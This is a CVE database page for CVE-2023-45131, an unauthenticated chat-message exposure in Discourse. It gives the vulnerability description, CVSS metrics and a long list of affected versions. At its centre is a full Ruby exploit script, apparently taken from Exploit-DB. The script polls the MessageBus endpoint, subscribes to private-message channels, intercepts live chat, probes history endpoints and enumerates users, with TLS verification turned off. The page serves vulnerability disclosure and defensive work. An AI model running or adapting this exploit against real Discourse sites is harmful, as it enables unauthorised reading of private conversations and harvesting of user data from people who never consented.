CVE-2023-45131
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Unauthenticated access to new private chat messages in Discourse
Discourse is an open source platform for community discussion. New chat messages can be read by making an unauthenticated POST request to MessageBus. This issue is patched in the 3.1.1 stable and 3.2.0.beta2 versions of Discourse. Users are advised to upgrade. There are no known workarounds for this vulnerability.CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Exposure of Sensitive Information to an Unauthorized Actor The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. |
||
| No informations. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V3.1 | 7.5 | HIGH |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
More informations
Base: Exploitabilty MetricsThe Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. Network The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). Attack Complexity This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. Low Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. None The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. User Interaction This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component. None The vulnerable system can be exploited without interaction from any user. Base: Scope MetricsThe Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope. Scope Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs. Unchanged An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority. Base: Impact MetricsThe Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. High There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. None There is no loss of integrity within the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. None There is no impact to availability within the impacted component. Temporal MetricsThe Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability. Environmental MetricsThese metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability. |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 52375
Publication date : 2025-07-21 22h00 +00:00
Author : İbrahimsql
EDB Verified : No
#!/usr/bin/env ruby
# Title : Discourse 3.1.1 - Unauthenticated Chat Message Access
# CVE-2023-45131
# CVSS: 7.5 (High)
# Affected: Discourse < 3.1.1 stable, < 3.2.0.beta2
# Author ibrahimsql @ https://twitter.com/ibrahmsql
# Date: 2023-12-14
require 'net/http'
require 'uri'
require 'json'
require 'openssl'
require 'base64'
class CVE202345131
def initialize(target_url)
@target_url = target_url.chomp('/')
@results = []
@message_bus_client_id = nil
@csrf_token = nil
end
def run_exploit
puts "\n[*] Testing CVE-2023-45131: Discourse Unauthenticated Chat Message Access"
puts "[*] Target: #{@target_url}"
puts "[*] CVSS Score: 7.5 (High)"
puts "[*] Affected: Discourse < 3.1.1 stable, < 3.2.0.beta2\n"
# Test MessageBus access
test_messagebus_access
test_chat_channel_enumeration
test_private_message_access
test_real_time_monitoring
test_message_history_access
test_user_enumeration_via_chat
generate_report
@results
end
private
def test_messagebus_access
puts "[*] Testing MessageBus unauthenticated access..."
begin
# Get MessageBus client ID
uri = URI("#{@target_url}/message-bus/poll")
response = make_request(uri, 'GET')
if response && response.code == '200'
begin
data = JSON.parse(response.body)
if data.is_a?(Array) && !data.empty?
@message_bus_client_id = extract_client_id(response)
@results << {
vulnerability: "MessageBus Access",
severity: "High",
description: "Unauthenticated access to MessageBus endpoint confirmed",
impact: "Can monitor real-time messages and notifications",
client_id: @message_bus_client_id
}
puts "[+] MessageBus access confirmed - Client ID: #{@message_bus_client_id}"
return true
end
rescue JSON::ParserError
# Try alternative endpoints
test_alternative_messagebus_endpoints
end
end
rescue => e
puts "[!] Error testing MessageBus access: #{e.message}"
end
false
end
def test_alternative_messagebus_endpoints
puts "[*] Testing alternative MessageBus endpoints..."
endpoints = [
"/message-bus/poll",
"/message-bus/subscribe",
"/message-bus/diagnostics",
"/message-bus/long-poll"
]
endpoints.each do |endpoint|
begin
uri = URI("#{@target_url}#{endpoint}")
response = make_request(uri, 'GET')
if response && response.code == '200'
if response.body.include?('message-bus') || response.body.include?('clientId')
@results << {
vulnerability: "Alternative MessageBus Endpoint",
severity: "Medium",
endpoint: endpoint,
description: "Alternative MessageBus endpoint accessible",
impact: "Potential message monitoring capability"
}
puts "[+] Alternative endpoint accessible: #{endpoint}"
end
end
rescue => e
puts "[!] Error testing endpoint #{endpoint}: #{e.message}"
end
end
end
def test_chat_channel_enumeration
puts "[*] Testing chat channel enumeration..."
return unless @message_bus_client_id
begin
# Try to enumerate chat channels
uri = URI("#{@target_url}/message-bus/poll")
# Subscribe to chat channels
data = {
'/chat/new-messages' => -1,
'/chat/channel-status' => -1,
'/chat/user-tracking' => -1,
'clientId' => @message_bus_client_id
}
response = make_request(uri, 'POST', data)
if response && response.code == '200'
begin
messages = JSON.parse(response.body)
if messages.is_a?(Array) && !messages.empty?
chat_channels = extract_chat_channels(messages)
if !chat_channels.empty?
@results << {
vulnerability: "Chat Channel Enumeration",
severity: "High",
channels: chat_channels,
description: "Enumerated accessible chat channels",
impact: "Can identify active chat channels and participants"
}
puts "[+] Chat channels enumerated: #{chat_channels.join(', ')}"
end
end
rescue JSON::ParserError => e
puts "[!] Error parsing chat channel response: #{e.message}"
end
end
rescue => e
puts "[!] Error enumerating chat channels: #{e.message}"
end
end
def test_private_message_access
puts "[*] Testing private message access..."
return unless @message_bus_client_id
begin
# Try to access private messages
uri = URI("#{@target_url}/message-bus/poll")
# Subscribe to private message channels
data = {
'/private-messages' => -1,
'/chat/private' => -1,
'/notification' => -1,
'clientId' => @message_bus_client_id
}
response = make_request(uri, 'POST', data)
if response && response.code == '200'
begin
messages = JSON.parse(response.body)
if messages.is_a?(Array)
private_messages = extract_private_messages(messages)
if !private_messages.empty?
@results << {
vulnerability: "Private Message Access",
severity: "Critical",
messages: private_messages,
description: "Accessed private chat messages without authentication",
impact: "Complete breach of private communication confidentiality"
}
puts "[+] Private messages accessed: #{private_messages.length} messages found"
# Log sample messages (redacted)
private_messages.first(3).each_with_index do |msg, idx|
puts " [#{idx + 1}] #{redact_message(msg)}"
end
end
end
rescue JSON::ParserError => e
puts "[!] Error parsing private message response: #{e.message}"
end
end
rescue => e
puts "[!] Error accessing private messages: #{e.message}"
end
end
def test_real_time_monitoring
puts "[*] Testing real-time message monitoring..."
return unless @message_bus_client_id
begin
puts "[*] Monitoring for 10 seconds..."
start_time = Time.now
monitored_messages = []
while (Time.now - start_time) < 10
uri = URI("#{@target_url}/message-bus/poll")
data = {
'/chat/new-messages' => 0,
'clientId' => @message_bus_client_id
}
response = make_request(uri, 'POST', data)
if response && response.code == '200'
begin
messages = JSON.parse(response.body)
if messages.is_a?(Array) && !messages.empty?
new_messages = extract_new_messages(messages)
monitored_messages.concat(new_messages)
end
rescue JSON::ParserError
# Continue monitoring
end
end
sleep(1)
end
if !monitored_messages.empty?
@results << {
vulnerability: "Real-time Message Monitoring",
severity: "High",
messages_count: monitored_messages.length,
description: "Successfully monitored real-time chat messages",
impact: "Can intercept live communications"
}
puts "[+] Real-time monitoring successful: #{monitored_messages.length} messages intercepted"
else
puts "[-] No real-time messages detected during monitoring period"
end
rescue => e
puts "[!] Error during real-time monitoring: #{e.message}"
end
end
def test_message_history_access
puts "[*] Testing message history access..."
begin
# Try to access message history through various endpoints
history_endpoints = [
"/chat/api/channels",
"/chat/api/messages",
"/chat/history",
"/api/chat/channels.json"
]
history_endpoints.each do |endpoint|
uri = URI("#{@target_url}#{endpoint}")
response = make_request(uri, 'GET')
if response && response.code == '200'
begin
data = JSON.parse(response.body)
if data.is_a?(Hash) && (data['messages'] || data['channels'] || data['chat'])
@results << {
vulnerability: "Message History Access",
severity: "High",
endpoint: endpoint,
description: "Accessed chat message history without authentication",
impact: "Historical chat data exposure"
}
puts "[+] Message history accessible via: #{endpoint}"
end
rescue JSON::ParserError
# Check for HTML responses that might contain chat data
if response.body.include?('chat') && response.body.include?('message')
@results << {
vulnerability: "Message History Exposure",
severity: "Medium",
endpoint: endpoint,
description: "Chat-related content found in response",
impact: "Potential information disclosure"
}
puts "[+] Chat-related content found in: #{endpoint}"
end
end
end
end
rescue => e
puts "[!] Error testing message history access: #{e.message}"
end
end
def test_user_enumeration_via_chat
puts "[*] Testing user enumeration via chat features..."
begin
# Try to enumerate users through chat-related endpoints
user_endpoints = [
"/chat/api/users",
"/chat/users.json",
"/api/chat/users",
"/chat/members"
]
user_endpoints.each do |endpoint|
uri = URI("#{@target_url}#{endpoint}")
response = make_request(uri, 'GET')
if response && response.code == '200'
begin
data = JSON.parse(response.body)
if data.is_a?(Hash) && (data['users'] || data['members'])
users = extract_users_from_chat(data)
if !users.empty?
@results << {
vulnerability: "User Enumeration via Chat",
severity: "Medium",
endpoint: endpoint,
users_count: users.length,
sample_users: users.first(5),
description: "Enumerated chat users without authentication",
impact: "User information disclosure"
}
puts "[+] Users enumerated via #{endpoint}: #{users.length} users found"
end
end
rescue JSON::ParserError
# Continue with next endpoint
end
end
end
rescue => e
puts "[!] Error testing user enumeration: #{e.message}"
end
end
def extract_client_id(response)
# Extract client ID from response headers or body
if response['X-MessageBus-Client-Id']
return response['X-MessageBus-Client-Id']
end
# Try to extract from response body
begin
data = JSON.parse(response.body)
if data.is_a?(Hash) && data['clientId']
return data['clientId']
end
rescue JSON::ParserError
end
# Generate a random client ID
SecureRandom.hex(16)
end
def extract_chat_channels(messages)
channels = []
messages.each do |message|
if message.is_a?(Hash)
if message['channel'] && message['channel'].include?('/chat/')
channels << message['channel']
elsif message['data'] && message['data'].is_a?(Hash)
if message['data']['channel_id']
channels << "Channel #{message['data']['channel_id']}"
end
end
end
end
channels.uniq
end
def extract_private_messages(messages)
private_msgs = []
messages.each do |message|
if message.is_a?(Hash)
if message['channel'] && (message['channel'].include?('/private') || message['channel'].include?('/chat/private'))
private_msgs << {
channel: message['channel'],
data: message['data'],
timestamp: message['timestamp'] || Time.now.to_i
}
elsif message['data'] && message['data'].is_a?(Hash)
if message['data']['message'] || message['data']['content']
private_msgs << {
content: message['data']['message'] || message['data']['content'],
user: message['data']['user'] || message['data']['username'],
timestamp: message['data']['timestamp'] || Time.now.to_i
}
end
end
end
end
private_msgs
end
def extract_new_messages(messages)
new_msgs = []
messages.each do |message|
if message.is_a?(Hash) && message['data']
new_msgs << {
channel: message['channel'],
data: message['data'],
timestamp: Time.now.to_i
}
end
end
new_msgs
end
def extract_users_from_chat(data)
users = []
if data['users'] && data['users'].is_a?(Array)
data['users'].each do |user|
if user.is_a?(Hash)
users << {
username: user['username'],
id: user['id'],
name: user['name']
}
end
end
elsif data['members'] && data['members'].is_a?(Array)
data['members'].each do |member|
if member.is_a?(Hash)
users << {
username: member['username'] || member['user'],
id: member['id'] || member['user_id']
}
end
end
end
users
end
def redact_message(message)
if message.is_a?(Hash)
content = message[:content] || message['content'] || message[:data] || 'N/A'
user = message[:user] || message['user'] || 'Unknown'
"User: #{user}, Content: #{content.to_s[0..50]}..."
else
message.to_s[0..50] + "..."
end
end
def make_request(uri, method = 'GET', data = nil, headers = {})
begin
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = (uri.scheme == 'https')
http.verify_mode = OpenSSL::SSL::VERIFY_NONE if http.use_ssl?
http.read_timeout = 10
http.open_timeout = 10
request = case method.upcase
when 'GET'
Net::HTTP::Get.new(uri.request_uri)
when 'POST'
req = Net::HTTP::Post.new(uri.request_uri)
if data
if data.is_a?(Hash)
req.set_form_data(data)
else
req.body = data
req['Content-Type'] = 'application/json'
end
end
req
end
# Set headers
request['User-Agent'] = 'Mozilla/5.0 (compatible; DiscourseMap/2.0)'
request['Accept'] = 'application/json, text/javascript, */*; q=0.01'
request['X-Requested-With'] = 'XMLHttpRequest'
headers.each { |key, value| request[key] = value }
response = http.request(request)
return response
rescue => e
puts "[!] Request failed: #{e.message}"
return nil
end
end
def generate_report
puts "\n" + "="*60
puts "CVE-2023-45131 Exploitation Report"
puts "="*60
puts "Target: #{@target_url}"
puts "Vulnerabilities Found: #{@results.length}"
if @results.empty?
puts "[+] No chat message access vulnerabilities detected"
else
puts "\n[!] VULNERABILITIES DETECTED:"
@results.each_with_index do |result, index|
puts "\n#{index + 1}. #{result[:vulnerability]}"
puts " Severity: #{result[:severity]}"
puts " Description: #{result[:description]}"
puts " Impact: #{result[:impact]}"
if result[:messages_count]
puts " Messages Found: #{result[:messages_count]}"
end
if result[:channels]
puts " Channels: #{result[:channels].join(', ')}"
end
if result[:endpoint]
puts " Endpoint: #{result[:endpoint]}"
end
end
puts "\n[!] REMEDIATION:"
puts "1. Update Discourse to version 3.1.1 stable or 3.2.0.beta2 or later"
puts "2. Implement proper authentication for MessageBus endpoints"
puts "3. Review and restrict access to chat-related APIs"
puts "4. Monitor MessageBus access logs for suspicious activity"
puts "5. Consider disabling chat features if not required"
end
puts "\n" + "="*60
end
end
# Run the exploit if called directly
if __FILE__ == $0
if ARGV.length != 1
puts "Usage: ruby #{$0} <target_url>"
puts "Example: ruby #{$0} https://discourse.example.com"
exit 1
end
target_url = ARGV[0]
exploit = CVE202345131.new(target_url)
exploit.run_exploit
end
Products Mentioned
Configuraton 0
Discourse>>Discourse >> Version To (including) 3.1.1
- Discourse>>Discourse >> Version - (Open CPE detail)
- Discourse>>Discourse >> Version 0.8.0 (Open CPE detail)
- Discourse>>Discourse >> Version 0.8.1 (Open CPE detail)
- Discourse>>Discourse >> Version 0.8.2 (Open CPE detail)
- Discourse>>Discourse >> Version 0.8.3 (Open CPE detail)
- Discourse>>Discourse >> Version 0.8.4 (Open CPE detail)
- Discourse>>Discourse >> Version 0.8.5 (Open CPE detail)
- Discourse>>Discourse >> Version 0.8.6 (Open CPE detail)
- Discourse>>Discourse >> Version 0.8.7 (Open CPE detail)
- Discourse>>Discourse >> Version 0.8.8 (Open CPE detail)
- Discourse>>Discourse >> Version 0.8.9 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.0 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.1 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.2 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.2.5 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.2.6 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.3 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.3.5 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.4 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.5 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.5.1 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.5.2 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.6 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.6.1 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.6.2 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.6.3 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.6.4 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.7 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.7.1 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.7.2 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.7.3 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.7.4 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.7.5 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.7.6 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.7.7 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.7.8 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.7.9 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.8 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.8.1 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.8.2 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.8.3 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.8.4 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.8.5 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.8.6 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.8.7 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.8.8 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.8.9 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.8.10 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.8.11 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.1 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.2 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.3 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.4 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.5 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.6 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.7 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.8 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.9 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.10 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.11 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.12 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.13 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.14 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.15 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.16 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.17 (Open CPE detail)
- Discourse>>Discourse >> Version 0.9.9.18 (Open CPE detail)
- Discourse>>Discourse >> Version 1.0.0 (Open CPE detail)
- Discourse>>Discourse >> Version 1.0.1 (Open CPE detail)
- Discourse>>Discourse >> Version 1.0.2 (Open CPE detail)
- Discourse>>Discourse >> Version 1.0.3 (Open CPE detail)
- Discourse>>Discourse >> Version 1.0.4 (Open CPE detail)
- Discourse>>Discourse >> Version 1.1.0 (Open CPE detail)
- Discourse>>Discourse >> Version 1.1.1 (Open CPE detail)
- Discourse>>Discourse >> Version 1.1.2 (Open CPE detail)
- Discourse>>Discourse >> Version 1.1.3 (Open CPE detail)
- Discourse>>Discourse >> Version 1.2.0 (Open CPE detail)
- Discourse>>Discourse >> Version 1.2.1 (Open CPE detail)
- Discourse>>Discourse >> Version 1.2.2 (Open CPE detail)
- Discourse>>Discourse >> Version 1.2.3 (Open CPE detail)
- Discourse>>Discourse >> Version 1.2.4 (Open CPE detail)
- Discourse>>Discourse >> Version 1.3.0 (Open CPE detail)
- Discourse>>Discourse >> Version 1.3.1 (Open CPE detail)
- Discourse>>Discourse >> Version 1.3.2 (Open CPE detail)
- Discourse>>Discourse >> Version 1.3.3 (Open CPE detail)
- Discourse>>Discourse >> Version 1.3.4 (Open CPE detail)
- Discourse>>Discourse >> Version 1.3.5 (Open CPE detail)
- Discourse>>Discourse >> Version 1.4.0 (Open CPE detail)
- Discourse>>Discourse >> Version 1.4.1 (Open CPE detail)
- Discourse>>Discourse >> Version 1.4.2 (Open CPE detail)
- Discourse>>Discourse >> Version 1.4.3 (Open CPE detail)
- Discourse>>Discourse >> Version 1.4.4 (Open CPE detail)
- Discourse>>Discourse >> Version 1.4.5 (Open CPE detail)
- Discourse>>Discourse >> Version 1.4.6 (Open CPE detail)
- Discourse>>Discourse >> Version 1.4.7 (Open CPE detail)
- Discourse>>Discourse >> Version 1.5.0 (Open CPE detail)
- Discourse>>Discourse >> Version 1.5.1 (Open CPE detail)
- Discourse>>Discourse >> Version 1.5.2 (Open CPE detail)
- Discourse>>Discourse >> Version 1.5.3 (Open CPE detail)
- Discourse>>Discourse >> Version 1.5.4 (Open CPE detail)
- Discourse>>Discourse >> Version 1.6.0 (Open CPE detail)
- Discourse>>Discourse >> Version 1.6.1 (Open CPE detail)
- Discourse>>Discourse >> Version 1.6.2 (Open CPE detail)
- Discourse>>Discourse >> Version 1.6.3 (Open CPE detail)
- Discourse>>Discourse >> Version 1.6.4 (Open CPE detail)
- Discourse>>Discourse >> Version 1.6.5 (Open CPE detail)
- Discourse>>Discourse >> Version 1.6.6 (Open CPE detail)
- Discourse>>Discourse >> Version 1.6.7 (Open CPE detail)
- Discourse>>Discourse >> Version 1.6.8 (Open CPE detail)
- Discourse>>Discourse >> Version 1.6.9 (Open CPE detail)
- Discourse>>Discourse >> Version 1.6.10 (Open CPE detail)
- Discourse>>Discourse >> Version 1.7.0 (Open CPE detail)
- Discourse>>Discourse >> Version 1.7.1 (Open CPE detail)
- Discourse>>Discourse >> Version 1.7.2 (Open CPE detail)
- Discourse>>Discourse >> Version 1.7.3 (Open CPE detail)
- Discourse>>Discourse >> Version 1.7.4 (Open CPE detail)
- Discourse>>Discourse >> Version 1.7.5 (Open CPE detail)
- Discourse>>Discourse >> Version 1.7.6 (Open CPE detail)
- Discourse>>Discourse >> Version 1.7.7 (Open CPE detail)
- Discourse>>Discourse >> Version 1.7.8 (Open CPE detail)
- Discourse>>Discourse >> Version 1.7.9 (Open CPE detail)
- Discourse>>Discourse >> Version 1.7.10 (Open CPE detail)
- Discourse>>Discourse >> Version 1.8.0 (Open CPE detail)
- Discourse>>Discourse >> Version 1.8.1 (Open CPE detail)
- Discourse>>Discourse >> Version 1.8.2 (Open CPE detail)
- Discourse>>Discourse >> Version 1.8.3 (Open CPE detail)
- Discourse>>Discourse >> Version 1.8.4 (Open CPE detail)
- Discourse>>Discourse >> Version 1.8.5 (Open CPE detail)
- Discourse>>Discourse >> Version 1.8.6 (Open CPE detail)
- Discourse>>Discourse >> Version 1.8.7 (Open CPE detail)
- Discourse>>Discourse >> Version 1.8.8 (Open CPE detail)
- Discourse>>Discourse >> Version 1.8.9 (Open CPE detail)
- Discourse>>Discourse >> Version 1.8.10 (Open CPE detail)
- Discourse>>Discourse >> Version 1.8.11 (Open CPE detail)
- Discourse>>Discourse >> Version 1.9.0 (Open CPE detail)
- Discourse>>Discourse >> Version 1.9.1 (Open CPE detail)
- Discourse>>Discourse >> Version 1.9.2 (Open CPE detail)
- Discourse>>Discourse >> Version 1.9.3 (Open CPE detail)
- Discourse>>Discourse >> Version 1.9.4 (Open CPE detail)
- Discourse>>Discourse >> Version 1.9.5 (Open CPE detail)
- Discourse>>Discourse >> Version 1.9.6 (Open CPE detail)
- Discourse>>Discourse >> Version 1.9.7 (Open CPE detail)
- Discourse>>Discourse >> Version 2.0.0 (Open CPE detail)
- Discourse>>Discourse >> Version 2.0.1 (Open CPE detail)
- Discourse>>Discourse >> Version 2.0.2 (Open CPE detail)
- Discourse>>Discourse >> Version 2.0.3 (Open CPE detail)
- Discourse>>Discourse >> Version 2.0.4 (Open CPE detail)
- Discourse>>Discourse >> Version 2.0.5 (Open CPE detail)
- Discourse>>Discourse >> Version 2.1.0 (Open CPE detail)
- Discourse>>Discourse >> Version 2.1.1 (Open CPE detail)
- Discourse>>Discourse >> Version 2.1.2 (Open CPE detail)
- Discourse>>Discourse >> Version 2.1.3 (Open CPE detail)
- Discourse>>Discourse >> Version 2.1.4 (Open CPE detail)
- Discourse>>Discourse >> Version 2.1.5 (Open CPE detail)
- Discourse>>Discourse >> Version 2.1.6 (Open CPE detail)
- Discourse>>Discourse >> Version 2.1.7 (Open CPE detail)
- Discourse>>Discourse >> Version 2.1.8 (Open CPE detail)
- Discourse>>Discourse >> Version 2.2.0 (Open CPE detail)
- Discourse>>Discourse >> Version 2.2.1 (Open CPE detail)
- Discourse>>Discourse >> Version 2.2.2 (Open CPE detail)
- Discourse>>Discourse >> Version 2.2.3 (Open CPE detail)
- Discourse>>Discourse >> Version 2.2.4 (Open CPE detail)
- Discourse>>Discourse >> Version 2.2.5 (Open CPE detail)
- Discourse>>Discourse >> Version 2.2.6 (Open CPE detail)
- Discourse>>Discourse >> Version 2.2.7 (Open CPE detail)
- Discourse>>Discourse >> Version 2.2.8 (Open CPE detail)
- Discourse>>Discourse >> Version 2.2.10 (Open CPE detail)
- Discourse>>Discourse >> Version 2.2.11 (Open CPE detail)
- Discourse>>Discourse >> Version 2.2.15 (Open CPE detail)
- Discourse>>Discourse >> Version 2.3.0 (Open CPE detail)
- Discourse>>Discourse >> Version 2.3.1 (Open CPE detail)
- Discourse>>Discourse >> Version 2.3.2 (Open CPE detail)
- Discourse>>Discourse >> Version 2.3.3 (Open CPE detail)
- Discourse>>Discourse >> Version 2.3.4 (Open CPE detail)
- Discourse>>Discourse >> Version 2.3.5 (Open CPE detail)
- Discourse>>Discourse >> Version 2.3.6 (Open CPE detail)
- Discourse>>Discourse >> Version 2.3.7 (Open CPE detail)
- Discourse>>Discourse >> Version 2.3.8 (Open CPE detail)
- Discourse>>Discourse >> Version 2.3.9 (Open CPE detail)
- Discourse>>Discourse >> Version 2.3.10 (Open CPE detail)
- Discourse>>Discourse >> Version 2.4.0 (Open CPE detail)
- Discourse>>Discourse >> Version 2.4.1 (Open CPE detail)
- Discourse>>Discourse >> Version 2.4.2 (Open CPE detail)
- Discourse>>Discourse >> Version 2.4.3 (Open CPE detail)
- Discourse>>Discourse >> Version 2.4.4 (Open CPE detail)
- Discourse>>Discourse >> Version 2.4.5 (Open CPE detail)
- Discourse>>Discourse >> Version 2.5.0 (Open CPE detail)
- Discourse>>Discourse >> Version 2.5.1 (Open CPE detail)
- Discourse>>Discourse >> Version 2.5.2 (Open CPE detail)
- Discourse>>Discourse >> Version 2.5.3 (Open CPE detail)
- Discourse>>Discourse >> Version 2.5.4 (Open CPE detail)
- Discourse>>Discourse >> Version 2.5.5 (Open CPE detail)
- Discourse>>Discourse >> Version 2.5.6 (Open CPE detail)
- Discourse>>Discourse >> Version 2.6.0 (Open CPE detail)
- Discourse>>Discourse >> Version 2.6.0 (Open CPE detail)
- Discourse>>Discourse >> Version 2.6.1 (Open CPE detail)
- Discourse>>Discourse >> Version 2.6.2 (Open CPE detail)
- Discourse>>Discourse >> Version 2.6.3 (Open CPE detail)
- Discourse>>Discourse >> Version 2.6.4 (Open CPE detail)
- Discourse>>Discourse >> Version 2.6.5 (Open CPE detail)
- Discourse>>Discourse >> Version 2.6.6 (Open CPE detail)
- Discourse>>Discourse >> Version 2.6.7 (Open CPE detail)
- Discourse>>Discourse >> Version 2.7.0 (Open CPE detail)
- Discourse>>Discourse >> Version 2.7.1 (Open CPE detail)
- Discourse>>Discourse >> Version 2.7.2 (Open CPE detail)
- Discourse>>Discourse >> Version 2.7.3 (Open CPE detail)
- Discourse>>Discourse >> Version 2.7.4 (Open CPE detail)
- Discourse>>Discourse >> Version 2.7.5 (Open CPE detail)
- Discourse>>Discourse >> Version 2.7.6 (Open CPE detail)
- Discourse>>Discourse >> Version 2.7.7 (Open CPE detail)
- Discourse>>Discourse >> Version 2.7.8 (Open CPE detail)
- Discourse>>Discourse >> Version 2.7.9 (Open CPE detail)
- Discourse>>Discourse >> Version 2.7.10 (Open CPE detail)
- Discourse>>Discourse >> Version 2.7.11 (Open CPE detail)
- Discourse>>Discourse >> Version 2.7.12 (Open CPE detail)
- Discourse>>Discourse >> Version 2.7.13 (Open CPE detail)
- Discourse>>Discourse >> Version 2.8.0 (Open CPE detail)
- Discourse>>Discourse >> Version 2.8.1 (Open CPE detail)
- Discourse>>Discourse >> Version 2.8.2 (Open CPE detail)
- Discourse>>Discourse >> Version 2.8.3 (Open CPE detail)
- Discourse>>Discourse >> Version 2.8.4 (Open CPE detail)
- Discourse>>Discourse >> Version 2.8.5 (Open CPE detail)
- Discourse>>Discourse >> Version 2.8.7 (Open CPE detail)
- Discourse>>Discourse >> Version 2.8.8 (Open CPE detail)
- Discourse>>Discourse >> Version 2.8.10 (Open CPE detail)
- Discourse>>Discourse >> Version 2.8.11 (Open CPE detail)
- Discourse>>Discourse >> Version 2.8.12 (Open CPE detail)
